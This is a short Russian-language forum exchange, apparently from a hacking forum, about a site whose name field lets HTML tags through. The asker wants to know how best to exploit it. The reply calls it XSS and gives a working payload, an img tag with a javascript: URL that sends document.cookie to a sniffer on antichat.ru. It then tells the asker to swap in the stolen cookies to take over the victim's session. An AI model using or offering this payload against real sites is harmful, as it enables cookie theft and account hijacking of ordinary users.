Здрасти есть один сайт. При вводе имени в форму <form> можно вводить теги и они работают, а при попытке вводить (примерно) <? echo data("s = h = m")?> в тексте оказывается слеши перед кавычками <? echo data(/"s = h = m/")?> и ни че не работает, а простые теги html работают все!

Суть вопроса: на сколько опасна данная уязвимость, и как её лутше использовать.

В умелых руках уязвимость довольно опасна! Это так называемая XSS.

пишешь что то типа
<img src=javascript:aa=new&#x20;Image();aa.src=&quot;http://antichat.ru/cgi-bin/s.gif?&quot;+document.cookie;>
и если все пройдет ok на antichat'овский снифер придут куки. Дальше ты свои заменяешь на угнанные куки и юзаешь их по назначению. =)